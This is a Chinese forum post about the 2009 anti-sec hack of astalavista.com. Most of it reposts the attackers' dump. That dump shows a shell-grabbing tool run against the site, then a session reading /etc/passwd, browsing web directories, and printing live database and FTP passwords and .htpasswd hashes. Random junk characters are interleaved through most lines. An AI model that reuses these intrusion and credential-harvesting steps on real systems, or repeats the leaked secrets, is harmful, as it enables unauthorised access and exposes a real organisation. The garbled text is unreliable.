里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
8 [/ ]0 r0 b9 S$ \
: y" H, I: g8 o5 g1 x+ C[root@front3 ~]# curl -I litespeedtech.com, p! z3 e, ~( E0 h: U. x; d
HTTP/1.1 200 OK
9 y- W2 R- l' P6 I' [Date: Fri, 05 Jun 2009 22:54:51 GMT
; k! N0 g/ D: `0 HServer: LiteSpeed Z1 {% q" B+ |' S
& a& X) g8 r1 z) s另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
4 J3 z' M8 ?# B3 I2 s0 q2 g$ q5 U. f& c8 r& o8 U* G; \ L, Q
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
! p& e& G: a6 h8 Z% o2 _# ?' i, J9 K& ^: C& }
+ d1 G2 n# _ e+ p7 C W6 y: x3 j, e
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 3 H' [8 W! ~% G. N! p
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
3 I7 c$ C) r3 j3 y/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
- G! R5 E" H5 | q\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
" w# [0 K8 j/ g4 b \/ \/ \/ \/ \/ \/ \/6 `) A, K, G# S. \0 z+ M0 x
The Hacking & Security Community$ d9 e) y; U; N# k
[+] Founded in 1997 by a hacker computer enthusiast
- X3 G7 V! B& j8 y( K, v1 s[-] Exposed in 2009 by anti-sec group& P2 L3 D6 X' T& ~0 l
7 L0 O, x, Z3 k0 T
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:8 U( `! [* ~. M; c) y
>> 03. Who’s behind the site?
; ~. N/ \9 V( S" \0 `>>
! R3 `/ R; |" n>> A team of security and IT professionals, and a countless number of contributors from all over the world.% W7 D8 C5 E; }: h+ |2 {9 N, }
: a8 I/ t3 R" F1 j>> 05. Is it true that the site is visited by script-kiddies and warez fans only?3 H* T# l+ ]* n5 [
>>, O4 C( B* p! x4 \
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and# l! b4 G, o7 L) a9 b, \
military institutions.
1 r0 ^& m' ^2 }+ V7 z3 | ~+ q>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.& n' a" ]# z2 M! X$ W
/ u0 c6 D# z2 F& i3 v- ?Why has Astalavista been targeted?
- N9 L1 P* [2 b" W4 w# O. b, q, Y E
Other than the fact that they are not doing any of this for the “community” but
% t/ x- s& I; O) Sfor the money, they spread exploits for kids, claim to be a security community- }! K/ _, L5 ?& e0 C' Z1 A( d
(with no real sense of security on their own servers), and they charge you $6.66; D% {# n% d. S# w W
per months to access a dead forum with a directory filled with public releases" N7 g1 a" j+ p* |: n3 W- w1 _; Y
and outdated / broken services.0 _2 Z8 i0 G4 v; @
- ]2 y9 C7 b u `7 d6 i! ?( kWe wanted to see how good that “team of security and IT professionals” really is.* A9 G7 |, \0 Y4 r& o
' Y% W8 c9 S4 y7 d0 ?' nLet’s begin.
W9 x6 G& W* s' A! Q0 {8 Z# ]" n6 R8 B/ I
anti-sec:~# ./g0tshell astalavista.com -p 80
- Y3 O/ I: Q7 }% v5 G[+] Connecting to astalavista.com:806 @! a' {1 i6 O2 F
[+] Grabbing banner…
) k. L8 E5 c5 K: m. W+ Q# e# OLiteSpeed3 r; @) d( l# ^& a+ q6 ]* f
[+] Injecting shellcode…3 S7 K2 p1 w: ^* e* [4 E
[-] Wait for it
~$ J( M) ]' j0 B) A- x
; C0 D: b6 B+ ?8 B% Q[~] We g0tshell1 g$ {2 K/ x' c! E
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux9 O! Z4 p* Z$ x) g6 f
ID: uid=100(apache) gid=500(apache) groups=500(apache)' x. J# R! A0 |0 V% @
3 {# B, c# m; o5 a$ g5 N4 r( Ksh-3.2$ cat /etc/passwd
1 b+ i. Q, g3 G4 D: m3 {: Yroot:x:0:0:root:/root:/bin/bash# J& ^+ i+ y; W# {) R6 Z
bin:x:1:1:bin:/bin:/sbin/nologin* x9 a! u) ^/ e4 B6 K& k
daemon:x:2:2:daemon:/sbin:/sbin/nologin" z1 r+ Q! s7 x- D, g5 y/ K( s
adm:x:3:4:adm:/var/adm:/sbin/nologin. v7 z+ g+ W5 i7 D& u
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin7 `8 F- ~) I% ?0 Z
sync:x:5:0:sync:/sbin:/bin/sync
+ ~$ X4 u' }, Kshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown% l! _5 r% H5 {; n" e/ O" z, b
halt:x:7:0:halt:/sbin:/sbin/halt
: n+ F- s7 ^7 \! Q1 Jmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
/ o2 y6 c2 `( k0 G' q& p! jnews:x:9:13:news:/etc/news:+ m% D V! n: Q) n; Z- w8 |
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
3 `" \+ O6 Z, ]: m C2 P1 V# koperator:x:11:0 perator:/root:/sbin/nologin
Q1 ~- X, Y, Q' w4 x/ i9 igames:x:12:100:games:/usr/games:/sbin/nologin% ?' }* `$ u# f$ w- a7 H
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
# j0 g% a& b* s/ ^( n$ W; Eftp:x:14:50:FTP User:/var/ftp:/sbin/nologin4 ~; _0 X; w8 |6 h5 t& i8 q+ F. x
nobody:x:99:99:Nobody:/:/sbin/nologin5 @ ?3 @: x' v, K
rpm:x:37:37::/var/lib/rpm:/sbin/nologin: V% p1 V5 u! i6 y4 C1 m7 z
dbus:x:81:81:System message bus:/:/sbin/nologin/ J( w$ U- \5 }: h* u
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
E! ~1 H" i& m" vmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
: q# I& i* f# ]. D, Y; U0 H8 H" |smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin0 }3 k2 Y! e! d9 ^- ~( j* ]# z
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin! U9 C" x) X% D" x) q
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
' J" N) |5 H4 b% l- ]rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
3 u i6 g9 N, l8 c5 erpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
5 b. @9 F7 i4 a+ X: Ynfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin7 I/ r* t! A w' a9 P
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
& T6 z: ^6 U/ Y) v! vpcap:x:77:77::/var/arpwatch:/sbin/nologin M# @/ |" l& f: n* K2 L& Q8 P4 ?$ F' r
named:x:25:25:Named:/var/named:/sbin/nologin
. Y9 [* z4 a Q7 b/ oapache:x:100:500::/var/www:/bin/false, ~5 e" O7 Y9 h: `: R% C$ J
diradmin:x:101:101::/usr/local/directadmin:/bin/bash3 w- O% o# N8 L: N8 H) l
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash( `8 J2 v1 h0 H _" t8 G2 Y: a
webapps:x:500:501::/var/www/html:/bin/bash/ q. c: G/ I. \$ Z0 }0 o$ g
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
5 `' X, w r/ F3 jadmin:x:501:502::/home/admin:/bin/bash
- J. V* o/ f1 R/ x; {# l, Qjon:x:502:503::/home/jon:/bin/bash' S2 Z/ }- [6 i/ c( U
com:x:503:504::/home/com:/bin/bash
4 j3 z# [3 a# g! A! Entp:x:38:38::/etc/ntp:/sbin/nologin
9 p) O7 w6 J3 v6 R5 {$ L, h" Kais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
* Z% m2 y, S, mastanet:x:504:505::/home/astanet:/bin/bash. y' d+ i- S, T
avahi:x:70:70:Avahi daemon:/:/sbin/nologin. c$ X4 c3 G: f' A& F! f7 N
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin: C9 U) e3 h! m0 H0 B. h& X
5 V+ ^% r( n5 M: Wsh-3.2$ cat /etc/hosts
' c2 G7 M) H/ B6 }. T( l7 [# Do not remove the following line, or various programs
+ b" j( g* \) Q2 |; G# that require network functionality will fail./ M$ C5 |6 Z u4 d l B
127.0.0.1 localhost.localdomain localhost
% B x! n4 h7 v" \9 l9 {( ?9 y::1 localhost6.localdomain6 localhost67 g# F) ^4 F/ c# M! p# Q
80.74.154.172 asta1.astalavistaserver.com
3 X I2 F( |8 o0 y9 J
5 Z3 | r1 i! s8 @. D( zsh-3.2$ pwd
& V* o1 h. x# C3 c" Y# x. f/home/com/public_html: i( r, W/ q, c
$ c8 Z* l* Q, I( k( C
sh-3.2$ ls -la1 B2 v/ k5 A* g
total 18460; q$ q0 P% z7 G+ o7 A
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
0 k: ?6 f0 b' j( Xdrwx–x–x 11 com com 4096 Jun 25 2008 ..% O, j6 h: W M. L
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
$ s0 ~9 b" u$ W9 U1 A2 f9 }drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache( O2 P# C: X% I6 g; F8 R
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
S- o3 L+ @# u# W! D1 z$ B6 t' Hdrwxrwxrwx 2 com com 4096 May 19 00:50 config
8 {9 l# Q' r# H; M' ~' z0 F; Ldrwxr-xr-x 2 com com 4096 Mar 20 11:05 core! o. O" z; S: ^5 X
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules; j; h+ Q. U7 ~1 t( [$ v) {' j( W( q
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
& i6 r4 w: y0 D3 _drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo- r6 i4 i8 H/ S) `$ S# l! {& v
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__4 e: j; b# G2 r g
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
- k/ ~, F$ T3 k# @4 y$ Y3 n6 Cdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
" i4 H" C8 p! R( j0 r: fdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
0 G+ Q" X- A9 A) n0 m5 O+ j( B-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
+ x. S/ B h& h, V" _- z! ydrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
/ a4 a3 U( S: F% y3 t; r5 u-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
s3 n% C( e7 H* a; q& t6 I, m-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak3 L- n( x- H, [0 p) U
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
d+ [2 i; L3 v% Udrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
- k/ X% T! i6 o ?" j' i; h6 l Vdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images; R% V! l7 ~' R& r2 x
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
5 `9 T L! J: \2 M, e. zdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
1 w. X, a- G9 t* e, Vdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
5 g4 G- S3 A7 T. K' g8 @: Udrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
7 [, J/ E9 Y& \% L& [8 A+ ]$ }drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
U3 N* F" a6 ~2 u6 w3 ^! H7 |drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
' l, G; Y% \; f* s9 _! idrwxr-xr-x 34 com com 4096 May 28 16:30 modules' ]) M; x q+ s* j! X1 q
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
& L. y( ?3 [ _* M# S4 Xdrwxrwxr-x 22 com com 4096 May 28 17:06 _new1 F8 }: k' q# x6 H' D
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old: S1 |' R ^ A6 x2 I- T5 ^7 D/ Y
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
8 l; I5 Q+ s0 F' P) x+ @drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
9 V( A0 L2 X/ W; Y% N7 ~-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
( e# P# K+ r8 _! m" s" x! K-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml" Y- T5 l: f9 b0 n# N) f: G
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
3 I q4 h+ R$ s! \3 Q h& hdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
+ y) C' \7 T8 _, l3 M1 I$ Q% J! Qdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp* w' Q! m7 f" l$ I: r0 m: |
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam" A' i4 e9 i5 Q% \8 o
% e$ t0 T9 _' E+ R3 ]sh-3.2$ head -20 index.php" l3 p' l' \; r1 `6 C1 H
<?php; q% r* i3 v7 B' o {
" G, l; l) s( i$ L, N
/**
8 f2 U0 M! I$ b* The main page for the CMS
! e6 o; G3 H1 a4 p q* @copyright CONTREXX CMS - COMVATION AG
6 y$ z) i+ Z, H2 V; t' c$ k# s$ i* @author Comvation Development Team
* f: ^# W v. v* @version v1.0.9.10.1 stable
9 ?, ~- } F& F; |* ]* @package contrexx
( k' d* s; [3 g; ?0 t* @subpackage core* p: A' e$ r; _* F7 h
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage$ N9 D& q1 B: q
* @since v0.0.0.0: i$ e! B- @% X2 V* u
* @todo Capitalize all class names in project, V. |# z9 V- e. k
* @uses /config/configuration.php
. Q" R. L$ s+ p: L( q8 b$ b' a; n) H* @uses /config/settings.php
, T8 t& r7 w# { p- M2 X$ w, u* @uses /config/version.php
g7 n+ R2 J5 V6 [* H3 T" w! n: H* @uses /core/API.php+ M- ?: B4 [) t5 H0 _+ O/ F& o
* @uses /core_modules/cache/index.class.php
, ]4 ?( k% ^; c3 ~) K0 H2 q0 A* @uses /core/error.class.php
3 F" ~1 s! U% Q6 ^* @uses /core_modules/banner/index.class.php% X5 ^4 U6 {( ~3 ^7 q
* @uses /core_modules/contact/index.class.php
o# {4 Z1 D$ |3 K! \
5 ^% e. i8 Q+ R7 L% S; X6 Q, Esh-3.2$ cd config/+ h' o2 A+ _2 x1 b% T
sh-3.2$ ls -la
- @9 p* z2 j! y3 Y8 g* @9 ototal 32* E4 g+ P$ s @+ Y9 p7 P1 F
drwxrwxrwx 2 com com 4096 May 19 00:50 .$ b2 r6 A0 z2 z
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 r$ N& F/ M) \% E& i) v7 B3 |! t, D
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php+ X, \, \* S7 K0 @3 e
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php+ ~; \- }9 x& y/ s5 v: L7 S8 Q8 E
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php1 ?4 w. K( K1 S5 B/ Z l, L; C
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php4 w) V& U7 S, y& z" W* `1 Q7 C
& y4 w3 d5 f; G1 ^+ w# W' \
sh-3.2$ cat configuration.php
9 v/ n% v) O. S `[snip]; ]9 e% ]3 w A- c
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
7 s0 k; ]6 p, m' C; g7 [! z" ]$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
! L. q4 s& v6 C# m4 T! h$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix+ V! ~. ~7 E2 A r8 t# V
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
; M* T/ X, `2 m! S% X$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
5 l! ]# U0 u- z8 v& V$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
# x) C* \7 N* F1 P" J+ d$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)8 N' h# h" K/ m9 Q4 C
[snip]
6 W8 Q. R' @( [$_FTPCONFIG['is_activated'] = true; // Ftp support true or false' G5 r ^' A5 n: g4 X. ]" n
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode$ R+ }+ O0 @: u) R
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
5 o5 ~- L" G4 W9 s0 y$_FTPCONFIG['port'] = 21; // Ftp remote port
* W- ]) t$ B, O0 \5 x$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
, T! N# h! Q- e$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password: X3 r3 M0 T/ r# x2 [' @* l x$ b
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms; `/ t8 P) U% j$ J5 ?% a3 j4 I; O
. o$ y X1 I! v
sh-3.2$ cd ..8 s" z. [: N& ~# C8 `
sh-3.2$ cd dvd/2 O) N7 d! `8 a, f
sh-3.2$ ls -la! r) a$ G' r2 o. u0 {& I1 q& ^$ }# U
total 2913780
- n, U7 x5 f, a) ~7 ]9 Odrwxr-xr-x 2 com com 4096 Sep 9 2008 .
0 \0 F: r* J6 i7 Gdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..: N; N6 p/ J9 ]# d! K! N6 B/ J
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar6 A1 h3 w+ B l J6 X; q& E
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar4 w) X* \. m/ g/ N
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
9 G; P6 W! W4 z, L7 p-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess9 o8 |# h1 Z9 v8 c. {
" v' m' H- q0 |$ p: @0 K* E8 I0 Z
sh-3.2$ cat .htaccess
1 v5 b( Q) [# g! V3 ^: ?5 H( d2 H3 JauthType Basic
3 c# p5 e5 ]5 L9 VauthName DVD
3 s/ Y8 [ T0 ]& c$ H$ TauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd; f- O" t5 r7 f5 v" }$ z9 y+ Q; k
require valid-user2 W3 Z) J- G. `1 w: [
: Z) p6 ]) k! T/ H! n7 `* \sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
' r: C8 k9 |- ]DVDdownload:CRD8cuY6.MPT6: K' Y6 J8 Y" R% {, Z7 y! n
DVDdownload2:CR8a36.wluFMg' O7 y/ L5 n( R
5 w4 D/ j6 H' K. c: F* _8 `
sh-3.2$ cat test.php3 V5 |4 W. R- p+ P6 I: Z* N
<?php, j/ c9 D3 F( A& [! ^) ]
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;( A4 ^0 x; _6 [9 h' d$ V5 v2 e; B0 z f6 U
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
/ M* A% k! U3 B2 M1 u7 yecho $url;3 f8 }& z' n$ m* U2 i% T
?>0 s \* G4 E% M. k$ `% H1 O
0 c8 [& J. |6 C& P Y! Hsh-3.2$ cd modifications/
" R( z- }8 z/ Csh-3.2$ ls -la$ A$ s" O; {5 \! q
total 32$ e5 I8 Q/ Q: T8 f! q( g: y7 @& }
drwxr-xr-x 8 com com 4096 May 11 12:48 .: x" _9 i1 W* Q2 F+ i# D
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
& O6 r) ^. A# U4 J& J Tdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
7 C& I* W6 g% X0 j$ p4 Qdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs" _- W6 M9 j2 s8 S* K
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
9 r, U! p$ n' V( ?( a, { Ldrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc w8 k7 r3 C6 ]- F
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
$ ]' i5 F1 l- [& |0 q1 K, W1 P4 adrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
- G6 u6 \6 @ |* ~
$ h7 w/ a5 d- H. d; r- ^sh-3.2$ ls -R
8 M+ [' A4 t4 s2 l: \.:" |1 y, h/ P* r* c. Q
com_avtng cronjobs onlinetools pjirc search _tmp% y0 @. O; Z' T
6 G1 m% N; c+ `- z v./com_avtng:
) n) l d: s6 ]; K Vavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts; u# y2 |4 z, m: L- o# {
, g" G! c5 t1 \7 G. O+ v./com_avtng/scripts:
% C) n( ?( K1 M% W9 [7 D6 dpopunder.js9 @8 _. J% ] D' |1 U
/ X- B' x7 {; O h
./cronjobs:
' H; |$ b) `* G; z9 Z0 oexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
6 P$ J% s: F( i2 g2 l- X' I6 V
$ ?2 H9 e/ R3 ~9 z% q9 V./cronjobs/tmp:6 B+ E7 S( U5 Z. m7 ?3 e6 i
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv+ x( o4 u8 D; b+ L. A+ {
3 O6 b7 B8 d0 X9 [" x5 Q1 V./onlinetools:1 Q1 V0 W7 r: \/ e' p$ F
index.php
: z2 G% v% Z, k. U) X2 c9 P$ D6 w5 `% K3 v
./pjirc:
- r" a, l! i& [1 W/ E3 }8 ~5 Oa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
2 Q* c4 u# ], ^( I0 mAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
- } g- d* _/ c# z+ X1 Vbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd% q7 v; l$ d# o5 J* L/ s- w
! C1 Z- p0 X. t
./pjirc/img:
7 Y( n# g& I) z3 m' vange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif( G3 p$ M% O: f9 Z& ^4 ]
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif : P" _$ A N3 D8 D6 \
verre-eau.gif; |5 r& H" j+ j9 h
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
2 N$ H5 }5 y1 |* k" Mverre-vin.gif
% [1 @9 P+ r) q' B+ p i" t0 Uballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
' r' R$ |2 @+ [0 \6 Lbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
. F% j& }# l, ^0 {( T& O* Y- U4 S5 a% r; X. x
./pjirc/snd:
0 E5 W4 }0 u( |' Y9 H. ~: kbell2.au ding.au
/ ~; ~, l6 t+ V+ ]- K
7 ]* y, A) V( o$ g9 z1 H./search:/ k9 R% Y8 \9 ?% t' ^
searchEngines.php search.php
) [" N' P+ o1 z; F" Y. W
`9 M# t! m0 i: l. K./_tmp:
% z5 `( I, k- u' ] MdefaultPorts.php defaultPorts.txt( [. |/ C2 R$ R9 t/ z% z
% U, j- m& Y6 v) z* q' fsh-3.2$ cd cronjobs/
7 K B; w4 b6 tsh-3.2$ cat exploits.php6 I) V7 I4 E( G) K
[snip]& Q3 Z& B7 l0 ^) X. m1 S0 u
$categories = array();+ }& s0 b) W; N
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
3 M# N9 }; o9 j M$expolits = file($milw0rmFile);' i2 n- X7 ~ g& E/ g- G
$comExploits = array();8 L/ G. L) C$ Z' }
[snip]; \8 \# s3 M4 z. z0 r: h
// manage data' D0 E2 A ^6 C7 _$ O
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26404 ^- X4 h% C7 K' T
% q+ z5 n+ H5 R. [
// get path and title
+ \/ ?: W; S1 k9 ~9 g& V1 B, ]( Y $expolits[$x] = trim($expolits[$x]);
/ J1 A# p% i) Z% }8 w $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
. k o& j8 ^9 [: G $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);- }8 Z! t: l2 u5 {% | I. T0 J8 x
7 q0 |4 B1 V( r2 \ // check if file exists5 @" l( i' {/ |6 p$ A% Q* H8 T9 L
if (file_exists($path)) {
- D/ h- m( ]6 }, D: t' {$ q# e
8 p) J5 e' R( f+ Z9 q $text = file_get_contents($path);
; u& R. `7 Y+ Z7 S( g& m) c
5 t, x$ {1 M, l4 P // get content and date$ G5 F& o, w! ?. ? d4 d
//$text = htmlspecialchars($text, ENT_QUOTES);
1 e* B. Z2 c1 E, f7 |, { $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));: u7 ]0 |, r; Q3 B" M9 u U3 G
if ($tmptext != ”) {+ W9 W" x6 d+ ?/ L# ~, w# E
$text = $tmptext;! Y6 P; ]. P$ O0 j/ s0 U
} else {: d/ Y6 F1 z; `. D Q/ ?
$text = addslashes(htmlentities($text, ENT_QUOTES));
. K0 p# g/ w G9 b }
; {$ k c: x- A7 N $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));9 J9 v7 G5 x* E4 |& n8 a s! ~( s
$tmp = explode('-', $date);
5 c4 Z" ]3 ?- ~! P E! `4 y& A $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
' R+ z: K0 E" [( P! A' A $cat = getCategory ($path);/ G Y) P( E$ Z: I; w9 ^
$ext = pathinfo(basename($path));% ]' w8 s0 Z- P. M" y# F
$ext = $ext['extension'];9 h% n3 ?' W# o9 b9 Q2 g' A
$qStr = ”
9 A! O% V0 U7 y8 ] SELECT `id`
" p' D: ^) i0 L7 [/ n1 F8 R5 ] FROM `contrexx_module_exploits`
/ S2 [8 A, ~3 H" q WHERE `title` = ‘” . $title . “‘
- c8 X/ @& x4 ] AND `date` = ‘” . $date . “‘0 B: w# Y) O9 O) @
“;& N9 t$ [+ I v4 Y: m0 k w4 e/ F7 F
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
% z9 C) S& x2 J/ s8 J! ^ $q = $_objDB->query($qStr);- t4 z& _& R5 s+ |
$ z# ^, Y' i: U a# a4 [ if ($q->numRows() == 0) {3 s4 `, i% |$ h4 p! K M( j3 p
& U$ @4 D. { [) X4 f // prepare array
; U- U8 e) i! V6 A! @/ e* O $comExploits[$x]['date'] = $date;4 @7 x; t& E3 O+ n; z0 c7 P: W& b4 N# f' P
$comExploits[$x]['title'] = $title;
S, R8 ?( T5 Y$ Q0 l) a$ W $comExploits[$x]['author'] = ‘milw0rm’;
; H' V& S$ D- ]8 f3 u $comExploits[$x]['text'] = $text;
: K3 s1 ]. J3 f! ^ $comExploits[$x]['source'] = $ext;
! v, P* i$ ]- k C: ^% K% y0 C6 ? $comExploits[$x]['url1'] = ”;- |5 Q1 ]4 S5 r
$comExploits[$x]['url2'] = ”;
5 y5 U# x! W5 I4 m1 L1 J $comExploits[$x]['catid'] = $cat;9 \( w2 |0 h# ~! M
$comExploits[$x]['lang'] = ‘2′;
: t) s: Q, _; I# b% O; G $comExploits[$x]['userid'] = ‘12′;
1 ~: _& n) [( ~& F/ l/ P; m $comExploits[$x]['startdate'] = ‘0000-00-00′;. Z7 ~, q1 Z: i: X3 k# p, _
$comExploits[$x]['enddate'] = ‘0000-00-00′;
+ o& t) [7 t j* J& z5 K $comExploits[$x]['status'] = ‘1′;
: s2 D! w( U2 g. D6 h $comExploits[$x]['changelog'] = $date;
3 U( e. _; H& K' Q% ^# ?1 S8 z
" U, c5 i# g' ?% v+ b5 e4 s }2 V+ K, P* c$ i: V$ {% ^9 f' W
[snip]
/ O9 r/ P W) P: w' n" O $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
% e8 o9 N- O/ }# k" E+ `<rss version=”2.0″>
$ G4 B4 @* q1 ^8 c# u# Y* C <channel>
